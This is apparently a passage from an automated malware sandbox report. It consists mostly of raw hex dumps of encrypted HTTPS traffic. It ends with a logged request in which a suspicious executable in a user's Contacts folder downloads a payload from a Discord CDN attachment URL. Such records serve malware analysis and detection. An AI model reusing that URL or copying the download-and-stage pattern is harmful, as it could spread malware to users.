3a 6b 9b 0d f9 ad fa 3b ce 82 e5 0a 3f c0 f0 ba 4c 14 56 32 db 85 2d 9a bc 5c 51 eb ac 71 a7 ef 7b 88 d0 1b ff a7 eb b0 88 d2 b9 15 8a 28 50 3f 35 ea ce c8 dd 0e ec 3d f3 a5 ad 31 de 12 16 9c 4f d8 ff f5 3b
                                                                            Data Ascii: #f_$-(+kZjdA<9cU"{nypzqb:~.#}am;~rm)K&>k<hCZ<?r@PeM4Rm %e]rdx"%:k;?LV2-\Qq{(P?5=1O;
                                                                            2021-12-01 15:23:14 UTC 377 IN Data Raw: de 18 1a 9a 66 3c 67 59 27 38 f3 4a 8f dc 10 ff 29 21 34 cb c2 4d 9b 02 f6 4b 06 15 7d 6e aa e1 f9 dd 83 41 85 5f 2a a3 7e e5 09 fa 2e 49 0f 9b 19 11 12 5a 4d fd 35 6a 17 c1 dc ef e3 f9 14 b6 aa 81 25 d5 da 64 f3 7d 61 df 0d 9e 74 e2 01 b3 fa 6f 16 1f b8 af 95 ae 8c d7 93 55 58 51 5a 3e e3 77 9e 77 9c b8 00 39 35 f2 a3 7c 4c 8e 41 10 fe d7 e2 77 63 b9 df 18 51 11 99 d9 6c 0e fc b2 7b c1 3f 9c 75 8f 48 d7 9f ed be bf bd 4a 34 da de d0 f0 d3 8a 69 5a a5 e0 13 0a 80 1c c8 38 ef ec c2 b5 a4 ee df 8b a3 e7 0d fb e4 11 8d a7 e2 99 e3 80 04 f9 2a a2 23 93 d8 eb a4 f3 30 1f ae 81 a6 fb f3 a5 44 f0 fe 43 8a d1 36 9d 60 5b 5a 39 bd 32 a3 72 6f 17 c4 0a ef b0 85 38 ed 46 8c 27 ac 1c 08 07 b5 23 26 ab 1f 48 68 1b f1 23 a0 7f 96 d6 86 25 58 e3 6b 78 18 1c c7 ca e4 ff
                                                                            Data Ascii: f<gY'8J)!4MK}nA_*~.IZM5j%d}atoUXQZ>ww95|LAwcQl{?uHJ4iZ8*#0DC6`[Z92ro8F'#&Hh#%Xkx
                                                                            2021-12-01 15:23:14 UTC 379 IN Data Raw: 7b 78 5d 66 f3 d3 60 d1 ef cf 80 93 b9 26 b5 27 b9 3c 7c 8c d4 e4 b7 d2 1c 2a c7 63 4e b9 34 d6 60 d8 1a c1 4d 88 ae 9c 9c b2 78 ef 58 df 17 f2 27 a8 1b df 79 29 2e 43 0f 06 a3 e4 15 8e ce 22 d9 d7 82 2b cb c0 ce f0 39 ea a2 bd c5 eb a9 81 8f da e4 01 ff 96 39 fa 53 35 2e e6 99 5d 47 d9 65 be 6e fe ca 37 bc 5c 52 e0 63 53 35 f9 29 20 cf e7 1e 38 90 a9 f8 a2 ef 58 a4 57 a3 d5 7d 10 2d d3 33 6b 04 fd cb de 7f 25 3f d4 38 70 7e 8a c2 76 7f 43 01 d9 fd c2 4a 81 31 38 6d 86 d1 32 6d 0d 66 c7 c1 aa 7d 10 84 d7 f8 df 98 de f6 48 7c ee c8 3c 83 58 e8 9a 21 b6 b6 20 5d be 3d e8 26 31 54 25 a7 e7 8e d5 fb 7b 9e 78 0c 02 09 12 10 73 62 c6 54 d1 6a 0b 92 a4 f6 11 64 aa 4d b0 1b 34 cd b1 e3 14 ec b9 0c 7c 13 8b a3 7e 83 bb e5 60 45 e8 a9 e2 ea c2 9b eb b0 8d ac 10 7b
                                                                            Data Ascii: {x]f`&'<|*cN4`MxX'y).C"+99S5.]Gen7\RcS5) 8XW}-3k%?8p~vCJ18m2mf}H|<X! ]=&1T%{xsbTjdM4|~`E{
                                                                            2021-12-01 15:23:14 UTC 380 IN Data Raw: 75 d3 f9 d9 7a 1d 29 44 dc 1d bc af ec 74 20 71 60 dc 98 24 26 b0 00 d8 fc ba 35 de 54 b1 0c fe b5 ad 8e 12 15 88 2a b9 74 3d aa 9f fa d9 fb 58 ed bb 37 fc db a5 e0 ea 74 27 dc 17 8d 64 ce 3d f7 4a d2 b7 22 2d d5 9c 9c 3e cd 02 f0 30 da 3d ed 50 f4 e7 ca d1 7b 14 7f 63 51 02 1b 2a ca b7 33 c6 df 70 07 02 57 17 92 53 a8 19 16 41 14 1b a4 f4 35 e3 73 2f 66 85 b4 b1 80 fb c1 ae fb d6 96 4c 8a ad 7d 96 45 7f 60 44 1c 2d 3c fc dc 57 24 2d d5 92 13 8a 6c f3 ac 1a 61 d9 28 58 bf 20 a2 57 2d 2b 9a 42 e0 1d bc 3c f6 13 90 5d 5b b1 7c 7a 59 2d cd d2 c1 49 1a 6a 1f 2e ca be a7 e0 1a e6 9b a9 54 bf 23 af f4 15 b3 71 64 cf e7 00 42 ea 36 76 02 65 21 a3 12 5b 6f 22 34 4c 14 96 0e e5 ca e6 40 6c e6 9e 1a 1f b7 03 80 91 23 d5 95 57 a5 93 df 94 44 60 97 92 17 8f d8 76 88
                                                                            Data Ascii: uz)Dt q`$&5T*t=X7t'd=J"->0=P{cQ*3pWSA5s/fL}E`D-<W$-la(X W-+B<][|zY-Ij.T#qdB6ve![o"4L@l#WD`v
                                                                            2021-12-01 15:23:14 UTC 381 IN Data Raw: b5 27 a6 6c ee b0 0a f5 5d d0 f2 b5 a8 95 a2 e2 2e c4 d1 70 eb 73 e9 2d fb c5 4a 86 40 48 c6 c8 ca 50 70 eb 74 e3 45 a4 fe de 3b ec 34 45 f3 58 e1 cb a1 e8 33 49 8b a8 5c d2 7b 0d 5e 39 7f 7b a8 6a 27 ac 51 35 33 c6 d4 e8 24 e1 9c bf 23 63 56 46 1c af 2d ce fa 5c 32 9b fb 36 3a f5 b3 07 73 fa 39 00 58 96 9e 79 63 da a4 89 cf f1 5b 11 4a 8e 96 5a 47 ee 62 63 71 6b 73 ff a8 89 96 4c 85 bb 3c 9c eb f2 ca ac d8 31 e0 92 94 f4 71 ef 21 a9 ca 93 b8 53 ca 58 e7 07 35 fc 59 31 c4 2b 66 ae 4b 1e 2e 41 05 90 c3 df 93 d3 72 ee c9 8c bf bb 29 db 9b fa 1a 18 7a 12 12 8c e5 91 52 de 0c 61 9b 4a 99 1d bd f7 3c b2 9a d0 a7 e7 80 07 75 63 bf 5f a4 29 d6 f5 4e 8a 3e 2d 4f fc 51 b2 00 c7 57 23 b0 64 36 30 c4 98 40 66 57 b3 10 1d bd 24 ca 8d 0e 5d 57 32 75 67 50 a3 ef 64 59
                                                                            Data Ascii: 'l].ps-J@HPptE;4EX3I\{^9{j'Q53$#cVF-\26:s9Xyc[JZGbcqksL<1q!SX5Y1+fK.Ar)zRaJ<uc_)N>-OQW#d60@fW$]W2ugPdY
                                                                            Data Ascii: LM/ujK)lqH8Ygo<C"2Z1C:k^,Qt5 YUakS/zF(zp}r$~Hbdy;>"HJ'3?{^~">geI-;1NrF!N6x1+=;@K<tW6QJ+"C09<[t4j!iQsQG{x`Jp
                                                                            2021-12-01 15:23:14 UTC 510 IN Data Raw: f5 f4 0c cd 1a 28 7d a0 5a 88 1d 90 62 e4 04 d1 7c 25 b6 93 c9 61 ac b9 d8 cf 8f f6 a1 c5 96 60 19 a9 c8 e7 5b 74 43 30 e1 a5 56 81 04 d2 77 b2 0f b6 29 f1 3c 46 f0 03 10 30 39 d9 18 2c 17 a2 27 8a 7b a4 3c 46 b0 a3 c1 75 ae a4 5c f6 59 09 60 f8 46 b9 28 75 7e 2c a5 ce 3a 5a 6d 5a 75 b6 1a 2a ec 18 bb 05 f3 89 26 08 7b a5 78 3d 8c 08 83 91 a2 47 6d 5a e4 2c 19 a8 c8 e6 5f 7f a1 c4 fa 7b bb 05 4b 2d d4 c4 da cb 53 19 9e 5a 44 b4 52 99 36 57 d5 41 da cc 0e 33 17 a4 ba 9c de 3a dc 37 4d 2d 6c d8 60 fe cb 6a 6c d8 78 3a 14 3c 01 6c 81 93 af 20 77 b4 f2 08 bb 02 a0 5d 7c 20 1f 98 70 c6 ef 80 07 5d 54 9c 6e c3 47 3d 0c c9 a6 4f c9 66 3e 4a 4c a9 d6 c7 85 98 98 68 5b 73 cf 51 82 10 a7 cd c4 fa dd b4 2a 74 7d a4 02 d0 8a 05 0e 32 13 bf 04 d5 43 37 c2 f1 ac be bd
                                                                            Data Ascii: (}Zb|%a`[tC0Vw)<F09,'{<Fu\Y`F(u~,:ZmZu*&{x=GmZ,_{K-SZDR6WA3:7M-l`jlx:<l w]| p]TnG=Of>JLh[sQ*t}2C7
                                                                            2021-12-01 15:23:14 UTC 514 IN Data Raw: a3 e1 90 47 e7 99 dc 05 8e bb 31 d9 9b 09 74 fe be 63 55 33 3a a6 7d 97 30 e3 95 d3 8a 97 d7 76 e3 19 9c 65 bd 4c 9b e0 e9 cc dc 05 8e 17 97 d6 12 4e a0 6f 94 68 e1 91 2f ff db 80 fa 59 3c 72 1d a6 7d 97 31 28 41 01 b9 f4 40 7c f5 02 e2 12 ec 86 2c 4a 70 65 5a bf dd 06 ec 2d 28 31 d8 fb 37 85 aa 86 ca 8d be b8 4c cb 59 3c 73 7d 96 54 49 22 32 5b a7 d7 77 86 ca cd 5e c9 b2 91 c8 d3 88 c9 54 af 13 8d be b8 4f fd d6 f4 a5 34 5f 4a 73 c7 4f 23 b5 22 32 5b a4 e0 0e 01 ba 2d ce e0 eb db 81 a0 6e f0 36 65 b4 26 3c 73 7d 96 55 33 33 b3 1d a7 11 d6 f5 c3 ab 59 3c 72 14 33 dd 87 41 2a 46 8d 50 b1 18 18 f4 be b9 2d 23 5d 46 8c 3c 73 7d 97 3a ac 8c 3c 73 7d 96 54 42 36 64 d7 77 87 af 12 e7 07 6e f1 55 b4 a0 6f 9e 11 88 30 b8 c2 c3 44 6a b0 96 55 32 5a be b8 47 35 e2
                                                                            Data Ascii: G1tcU3:}0veLNoh/Y<r}1(A@|,JpeZ-(17LY<s}TI"2[w^TO4_JsO#"2[-n6e&<s}U33Y<r3A*FP-#]F<s}:<s}TB6dwnUo0DjU2ZG5
                                                                            2021-12-01 15:23:14 UTC 518 IN Data Raw: 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 48 e1 90 46 8c 3c 73 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d4 d0 e6 1d a6 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 85 4a 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d bc 14 0f 83 a5 fa 4f 23 b5 22 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d5 02 e2 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be bb 71 78 09 74 ff db 81 a0 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d bc a4 78 09 74 ff db 81 a0 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d bf db 81 a0 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b
                                                                            Data Ascii: Kdw,HF<s}U2Z,Kdw,Kd}U2Z,Kdw,KdwJU2Z,Kdw,KdwO#"2Z,Kdw,Kd,Kdw,Kdwqxtn6dw,Kdwxtn6dw,Kdwn6dw,K
                                                                            2021-12-01 15:23:14 UTC 522 IN Data Raw: e8 22 73 05 31 60 cd 1f d3 55 88 31 99 0f f7 7e e7 60 13 55 da ff 9a 8c bc 15 92 0a b8 fe e3 6a 19 78 76 ec 2c 0a 81 7c ab 09 35 9a 43 bf 3b b0 45 8a 8e be 46 52 51 c0 be f8 99 a0 cf 63 14 41 54 15 6d 91 2c e9 4c 9b a0 19 40 c5 4a d7 0f 87 15 92 0a 25 c6 74 00 22 ed b0 7e 18 58 6a 9e c8 d2 aa c9 00 67 a0 91 2c 8e a9 04 a6 0a 2a fe 59 7d e1 7c a9 04 a6 ae e9 1d 59 c3 9a 1e c0 be f8 99 a8 23 b5 63 1b f5 78 f6 ba 4b f1 50 a5 bb 46 50 1d a6 3c 04 23 0f 83 e4 cb 2d 77 78 f6 9a 3b 19 9c 25 69 e0 af 13 cc 92 1f 11 77 78 ec 27 57 37 a6 0a 42 3a 6e b1 6f ef 09 74 be 6a 62 6b 96 ab cf 8c d4 f0 77 54 43 a4 87 50 69 f1 50 a5 bb e2 ff 7a f1 47 c1 17 7f 9b a0 bd da 5e c8 93 1e fc 41 8b 46 73 82 4a 1b 2a b9 d2 3e 29 2c b4 5f b4 c8 57 ba 7f 10 fa b1 c0 b8 42 7d 69 9b 85
                                                                            Data Ascii: "s1`U1~`Ujxv,|5C;EFRQcATm,L@J%t"~Xjg,*Y}|Y#cxKPFP<#-wx;%iwx'W7B:notjbkwTCPiPzG^AFsJ*>),_WB}i
                                                                            2021-12-01 15:23:14 UTC 525 IN Data Raw: e2 07 cd a1 0e ff ff 33 8e 11 77 79 6f 04 0f 4f 66 57 c8 2d 15 e1 78 09 35 8a 2b 71 b4 f5 4f 23 f4 93 dd 25 45 f4 bf 7e f0 65 0a 09 8a d4 68 09 a4 3d 7d 69 9b 3a fa a7 ff 9a 37 e3 2d 1e 7d 1b a1 b1 cb 55 91 37 19 63 33 35 b1 48 6e 0e e3 2c a3 21 f5 49 eb 56 6f c6 25 ba ee 56 58 01 8b ec a1 f0 77 54 a7 5c 3c 8d 41 87 47 5c 93 32 a4 9b 3b 19 44 c2 48 6e 0f 58 6f 9b e1 d1 0f 57 8f 1b f4 cd 5e 89 67 5b e2 ec d2 14 a7 17 c4 98 a5 04 04 1c cb 85 ef 38 96 aa 5c 34 b7 27 fe 3e c4 70 29 91 45 0a b7 f4 6c 48 6e 0e ff 12 e2 40 2d 31 26 d8 e6 f5 22 77 0c 04 18 c5 52 42 82 63 32 fe e1 70 a0 e3 95 93 1e 00 7e e7 61 af f9 24 64 87 50 5b a5 c7 a7 1b e4 93 32 a5 26 05 81 a0 2f b4 2c f3 59 69 e9 a4 39 3f e3 36 9b 1e 28 4a 7e 4b 49 eb 57 d3 33 35 0a b3 96 aa 78 d5 28 a9 04
                                                                            Data Ascii: 3wyoOfW-x5+qO#%E~eh=}i:7-}U7c35Hn,!IVo%VXwT\<AG\2;DHnXoW^g[8\4'>p)ElHn@-1&"wRBc2p~a$dP[2&/,Yi9?6(J~KIW35x(
                                                                            2021-12-01 15:23:14 UTC 530 IN Data Raw: f4 83 26 07 e7 67 d4 0f 7c ee 5c 2b 3d a3 7e e0 43 8e 9d a6 f6 4d 5b ca 81 96 de 0d 90 c5 4f 57 c1 c5 aa f2 b0 69 9a a6 12 e2 eb fc df 6b 2c c6 35 a7 76 06 2c c8 d1 6b 9d a6 f6 4d 5b ca ee da 07 e5 65 a5 07 c6 25 4e f5 49 c8 92 c0 b6 e0 85 aa 87 50 5a 5f ca dc 8f c7 25 a6 09 b4 24 c8 2d 31 e0 e6 1e a3 90 ad fa 17 94 58 fc df 93 46 70 b0 1d d4 1b 55 6a e5 92 0e 8b a9 5c 48 6d 2b 42 8c 49 14 0b 01 dc f8 0f 08 0e ff 2e 37 0f 73 3d 7d 9e 2c c0 5a eb 22 cd a0 97 36 8c c8 87 24 d3 28 cc 23 4a 6d 76 ec d8 af 98 86 6c 60 c5 0f 08 d6 80 dd 02 1d 59 ca f5 2a 1c cf 26 b7 2f 96 de e1 dd 0d 81 5e 32 57 df 7f ce 6a 0e 45 87 ff 24 c8 d5 df 63 b9 69 ed 5e 88 ba a7 ba 24 67 af 56 39 18 5c 4a 62 90 45 02 b7 ac 80 5d cd a2 36 ef b3 1d a6 84 ce 1d e3 1c 01 d6 91 fa b0 f2 3b
                                                                            Data Ascii: &g|\+=~CM[OWik,5v,kM[e%NIPZ_%$-1XFpUj\Hm+BI.7s=},Z"6$(#Jmvl`Y*&/^2WjE$ci^$gV9\JbE]6;
                                                                            2021-12-01 15:23:14 UTC 534 IN Data Raw: 56 b4 e0 38 d9 7c 53 1b 35 e2 53 14 1f ab 49 2d d2 eb e9 9d fe 59 7c 2a 52 aa c7 76 0c fb 91 af c7 4f 23 b5 2e 50 e4 23 dd 86 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 58 82 4a 96 15 1f 68 bc 4c 70 0a 09 75 81 49 d7 77 c6 f6 52 c2 d3 e4 7c 4a cf 39 2c 78 f6 ba bc ee d9 7c 53 3d f6 50 2e 50 a5 fa 4d a7 ff 9a d5 e6 a5 ef c6 cd 1f 79 74 fa b0 b6 2c 2f e3 6a 82 22 73 46 9c 0c ae 51 1b 4d 95 87 af 13 8d 8f c3 45 0a f7 38 96 aa 78 09 74 ff eb a9 04 e7 9e 96 aa 78 f6 45 4a 1b 62 8f 3b 1a e1 6f 72 99 35 21 b0 d7 4d a9 6c fb 58 dd df d2 b1 d8 c9 ab f6 65 98 b2 9b a0 bc 70 4d e1 6f f9 e0 e6 1d e7 4d c6 75 7d 69 9a ad e6 e2 ec a6 46 64 d7 36 ee a1 48 6e 0f 9c 19 74 ff 9a 65 5e 70 0a 09 54 40 95 d2 aa 55 f6 fd 29 3b 7b c8 3a
                                                                            Data Ascii: V8|S5SI-Y|*RvO#.P#,Kdw,Kdw,KXJhLpuIwR|J9,x|S=P.PMyt,/j"sFQME8xtxEJb;or5!MlXepMoMu}iFd6Hnte^pT@U);{:
                                                                            2021-12-01 15:23:14 UTC 538 IN Data Raw: 67 8d 8d f7 db ca 5c 95 d2 eb a9 80 8f 3c 63 de ca 5c e1 ee 30 49 6f f0 1e 5d 46 a8 f9 4c 43 8e b3 96 03 37 27 34 9c 64 d7 77 13 1c dc 0c 70 f5 83 8f 4f 99 1c a8 41 5b 1f f4 74 ac 73 65 d1 ae 1a e6 09 ff c3 03 ef 7b 9d 6d 76 42 09 84 ac 76 8f 94 06 bf fb 5a 7d 96 55 32 da 6d 91 d8 71 bb 31 d8 fa cb cb a6 6d e5 93 b9 fe dd 45 51 76 24 44 0e ff 24 36 a2 9b f9 8f 4e 72 f9 1e 2b 1b a2 a5 71 a0 e5 68 6a b0 c5 4a 92 89 e9 41 8b e2 4d 9b 9d 12 57 0c 03 39 65 a5 05 96 29 2c b7 62 59 c4 9d 6d a0 e5 ca df ce 6a f7 b9 d4 85 91 7f e6 ee 0a b8 e9 54 f2 b2 98 2f 23 c0 85 a2 98 aa f2 b2 9e 1c d3 30 6e 0f 7c ef 01 b7 db c4 43 d6 7e d6 7e 38 15 61 6b 99 a3 35 67 57 62 2d 32 1f 20 fb 5a 4e ed 25 f4 41 eb 59 40 bd b3 15 c7 b0 6a a3 7e cb d2 1b ec a7 bc b5 c9 a4 3d 7f 73 ac
                                                                            Data Ascii: g\<c\0Io]FLC7'4dwpOA[tse{mvBvZ}U2mq1mEQv$D$6Nr+qhjJAMW9e),bYmjT/#0n|C~~8ak5gWb-2 ZN%AY@j~=s
                                                                            2021-12-01 15:23:14 UTC 542 IN Data Raw: 0d 7e 59 20 3c 1b f4 80 2e a4 3d 7f 6b 3c fa b7 6a 6f 8f 8e c8 0e 4d 97 1e 1b f7 94 88 f5 41 ec a7 aa 47 84 e4 45 53 76 c7 c4 38 82 dd 79 ad 34 b6 66 23 4a be dd 6e 0c be 34 5f 0a ec cc b4 b0 1f cf 3a 37 bd f6 76 dc 8f 3c 8c 5f 28 a9 fb 2e 7d b6 4d e2 56 3f e7 ce 1e 20 a6 be 32 a6 28 cc fc dd e2 23 4a f2 3b b0 8c e5 f2 6e 30 66 04 6c b8 aa ed 42 09 21 20 ee f1 8b 79 07 ad 1a 4c 64 c7 c4 c8 92 c6 0e 5d a3 7e 43 5b 1e c0 55 cd a1 d1 f4 a9 c7 b0 69 4c 5d ae 6d 2b 44 78 f6 6d a0 86 dc 41 8d be f8 50 db e9 b4 29 a0 37 be e3 55 01 af f8 b5 dd a7 3e 91 0b 86 d3 90 bd de f1 fd 5d 46 cd 44 de 61 40 f4 24 6e a9 5e 08 c2 e7 cc 23 ad 85 52 ef 38 bf b0 62 9f 60 ed fd 29 dc 8f 3b b4 2b 1f 20 d1 25 31 fc 07 91 d0 6d 96 10 8e 92 c0 76 8f db d0 19 94 db 79 c9 df 5d cd 7e
                                                                            Data Ascii: ~Y <.=k<joMAGESv8y4f#Jn4_:7v<_(.}MV? 2(#J;n0flB! yLd]~C[UiL]m+DxmAP)7U>]FDa@$n^#R8b`);+ %1mvy]~
                                                                            2021-12-01 15:23:14 UTC 546 IN Data Raw: 4c 9b a1 c9 40 7d d6 cc d4 f0 77 8e 59 3c 73 7d ae 91 89 bf 0f 83 a5 fa 4f 23 b5 22 32 5a be b9 2c 4b 58 b2 df 8b b9 2c 4b 19 9c 64 d7 77 87 af 13 8d ff d1 f4 40 3d 7b 91 c8 d2 eb a9 44 97 d7 77 87 af 12 0a f6 45 02 8f a6 09 3d 91 a6 14 7d e2 40 29 cf 6d 6e b1 12 3a ae 1a 1e 28 32 3f 88 42 e3 f9 8f c4 c8 d2 eb e8 2a fe 59 7d 9f 8f b0 f1 d6 9c 16 60 9e 3d fe 5e c8 93 c7 43 95 a1 97 b9 45 78 7d c5 1e 20 2d ce e1 84 27 fe 51 c8 d2 eb a9 0c fb 91 d8 fa 4f 23 b5 20 2d ce e1 90 46 82 22 73 5c ab 09 35 c2 13 8d ff fb a9 04 a6 63 b1 18 58 a7 c7 4f 62 cf 87 af 52 b7 93 cd 1e 18 59 3c 32 47 8f c3 04 fb 7d 96 14 13 ad 0e 41 1a 8a 37 a6 64 4b 19 dc 34 1f ab 49 24 77 87 ee 27 9f eb e8 37 1b a1 b1 0d a6 7d d7 53 69 64 96 76 58 b9 6d 4f 9b e1 d1 49 24 37 a6 62 16 14 4e
                                                                            Data Ascii: L@}wY<s}O#"2Z,KX,Kdw@={DwE=}@)mn:(2?B*Y}`=^CEx} -'QO# -F"s\5cXObRY<2G}A7dK4I$w'7}SidvXmOI$7bN
                                                                            2021-12-01 15:23:14 UTC 562 IN Data Raw: 26 bf 6c bd 65 1a 1e 28 41 00 dd 86 2c 47 cd 03 81 2b 92 15 cd db f6 45 32 d9 88 74 74 0b 3c fa bb 74 fc 50 e5 11 7c 56 3f 2a 33 93 cf a0 ed be b8 ba fa c4 24 72 71 94 15 1b 49 51 2b 39 a9 8f d2 9e 6a 19 1f 43 40 f4 80 aa 88 3e 87 8a 51 2b 7e 17 9b 0e c1 7b 26 33 9b d1 1a e8 a7 b1 e8 a9 fb 2e 35 15 7a 0e 40 b7 5b 74 27 5f 26 e3 71 3d 7f 5b 72 1a 5b c8 da 17 14 0b 39 67 ab 4c 10 0d bd b5 d6 a8 09 84 62 5b b9 69 67 5f c0 4a d3 e6 6e 1b 55 77 0e f8 0f 80 1d a6 7d 36 e4 93 cd 5e c8 5b c7 40 7d 96 55 32 fe e1 13 75 d7 fe 51 7d 1d aa c2 48 c6 9b b2 7b 55 b1 f4 cb 0c 3b 7a 0e 41 e5 aa a2 8c fc df 48 ca 89 77 84 d8 05 0f c4 20 ee 1a d8 71 bb 6a b8 6c e8 dd 79 ea 72 12 cc f7 04 6c e5 e7 6c d0 3e f3 4f a8 d4 a3 36 39 14 e4 e7 60 bf bf d2 28 41 40 b4 36 0c eb 20 49
                                                                            Data Ascii: &le(A,G+E2tt<tP|V?*3$rqIQ+9jC@>Q+~{&3.5z@[t'_&q=[r[9gLb[ig_JnUw}6^[@}U2uQ}H{U;zAHw qjlyrll>O69`(A@6 I
                                                                            2021-12-01 15:23:14 UTC 574 IN Data Raw: e8 19 60 88 ba 62 a0 6d 86 d2 6a 80 1a 6d 64 fb 01 5b be a6 39 5a b1 0a 89 6c d0 19 63 ff 32 b2 5c 48 d2 1b 2a 84 24 51 18 f3 3e 1e d7 68 b5 94 5f cb 5d cb 99 df 4d 95 c4 23 43 36 7f 10 f9 91 43 fa b0 69 d3 85 6d e5 66 89 3f fb d1 ae 99 99 57 37 10 40 bb c9 df 77 d2 62 2a 0b f0 61 06 bf cf a7 7c ff 50 f0 f5 99 82 7d 89 3d 1b d5 52 55 2c 37 67 58 c6 15 a9 fb 2e fb 94 b8 6c 60 8e 40 96 4a 1d 56 3f 01 d4 a7 a9 57 37 e7 9f a8 82 22 32 5a b6 67 02 07 e5 c1 1e d7 88 98 e1 78 f6 ba 51 d4 7d 1d 60 46 73 82 dd 86 b9 a1 a9 fb 2e a8 8d 56 b4 e0 94 2c f3 e8 2e bb 68 1e d7 8f de e1 53 a6 28 4a e2 c8 57 c8 2d 30 ad 8b 30 95 e1 6f 8c c2 3f 7e 91 08 c2 33 56 6e 7b c7 1c dc fb 2f 2b 0d ff 37 6c be b9 2c 4b 39 ec 6d 2f 92 4b 19 9c 64 96 14 4e e1 90 46 8c 3c 3e 28 0c ba af
                                                                            Data Ascii: `bmjmd[9Zlc2\H*$Q>h_]M#C6Cimf?W7@wb*a|P}=RU,7gX.l`@JV?W7"2ZgxQ}`Fs.V,.hS(JW-00o?~3Vn{/+7l,K9m/KdNF<>(
                                                                            2021-12-01 15:23:14 UTC 590 IN Data Raw: 53 0f 0a 92 79 73 19 9c 24 6c b3 75 d7 a5 c9 a8 c7 c6 9c 88 ba fa 8f 48 52 aa c6 4d 2a e5 8a be b9 6d ee 05 7c 98 9a d4 33 80 44 de 52 f4 1f 6c 9e 69 9c 19 1f 53 68 68 e1 1b 59 79 07 91 37 05 ce 09 8b 46 6c cf 8a 3d 1d b6 2c 2f 8a 6e aa 47 3c 77 d4 0f 7f de 82 da a2 f8 6a 6f 17 a7 00 b9 2c 0b 23 76 6c be 79 bf 02 96 55 ca aa 04 1f ee b8 aa c6 4d 26 9d 1a 5b c8 85 fc 07 96 91 4b f5 49 41 90 85 f1 e6 42 df 52 df 50 20 36 ef b5 c9 ab f6 94 f2 d3 aa 0c fb d1 68 e9 1e 2b 40 7b 1a e0 85 be cc 19 a7 fb 97 5c d8 8e b7 a2 40 f6 62 a6 a6 f8 95 59 11 63 aa 78 d8 33 35 25 31 d8 fa 4f 2b 73 7d d7 f7 ff 78 09 ff db c0 3e 40 dc 1e 5d 83 9e 6d 29 4f 02 96 aa 02 e2 52 2a 7e 25 31 30 de 5c 94 06 bf ab ca 8c 3c 32 da c7 ec 28 19 15 82 ab 09 35 62 ea 32 d1 97 28 90 a9 ec 2c
                                                                            Data Ascii: Sys$luHRM*m|3DRliShhYy7Fl=,/nG<wjo,#vlyUM&[KIABRP 6h+@{\@bYcx35%1O+s}x>@]m)OR*~%10\<2(5b2(,
                                                                            2021-12-01 15:23:14 UTC 606 IN Data Raw: fe f1 50 a5 90 14 5e 5c b7 04 57 38 99 dc 04 e6 1d 1e b8 3a fe 29 2f d3 2c eb ec 31 52 56 e6 96 85 23 b6 2d c2 80 94 53 58 a9 57 0e c0 8f d7 36 ed aa cf ea 23 ff 50 b1 5a 35 f1 cc 1c a6 ed 3e bb 6a 26 0d 7e 1b 67 5b 12 83 b1 49 9d e2 59 b5 36 3e f1 bc ff 50 35 21 eb aa 0f 43 34 58 cd a2 32 d3 6c ab 84 2f 99 55 f2 be 95 a6 75 c0 35 e3 99 b6 26 5d 33 c7 c4 13 09 74 ff db 4a 13 82 22 73 dd c3 58 33 8e 80 94 57 f5 34 a3 a5 71 bb f1 89 4b e6 e6 e6 94 5f 8b 3c 28 82 79 d2 b4 50 2c 4b 19 dd 21 a0 6b af ef fd 5f 49 5f c6 3a 92 7c 77 07 fe c9 c4 c0 55 cd a1 0a 6b 81 af 61 50 a5 f1 88 cb d8 02 e0 5a 37 1b e9 2d cd 14 82 11 8c b1 07 1a c4 e1 6a 6f 8f bd 15 6d 91 37 17 28 41 41 a7 e3 80 ae 9e 6e 85 aa c6 6a c6 58 bd 17 57 e4 e7 60 32 a4 c0 a9 71 bf 02 da 76 00 9a d6
                                                                            Data Ascii: P^\W8:)/,1RV#-SXW6#PZ5>j&~g[IY6>P5!C4X2l/Uu5&]3tJ"sX3W4qK_<(yP,K!k_I_:|wUkaPZ7-jom7(AAnjXW`2qv
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            3 192.168.2.3 49757 162.159.130.233 443 C:\Users\user\Contacts\Wkklnmcz.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            2021-12-01 15:23:21 UTC 610 OUT GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1
                                                                            User-Agent: aswe
                                                                            Host: cdn.discordapp.com
                                                                            Cache-Control: no-cache
                                                                            2021-12-01 15:23:21 UTC 610 IN HTTP/1.1 200 OK
                                                                            Date: Wed, 01 Dec 2021 15:23:21 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 281088
                                                                            Connection: close
                                                                            CF-Ray: 6b6d50f53b6a1756-FRA
                                                                            Accept-Ranges: bytes
                                                                            Age: 36034
                                                                            Cache-Control: public, max-age=31536000
                                                                            Content-Disposition: attachment;%20filename=Wkklnmczcyrsyafzucgflytssyuynbb
                                                                            ETag: "95c7205834a4a92a4f9bfc212c2326dc"
                                                                            Expires: Thu, 01 Dec 2022 15:23:21 GMT
                                                                            Last-Modified: Wed, 01 Dec 2021 04:37:50 GMT
                                                                            Vary: Accept-Encoding
                                                                            CF-Cache-Status: HIT
                                                                            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                            x-goog-generation: 1638333470898312
                                                                            x-goog-hash: crc32c=meGuLw==
                                                                            x-goog-hash: md5=lccgWDSkqSpPm/whLCMm3A==
                                                                            x-goog-metageneration: 1
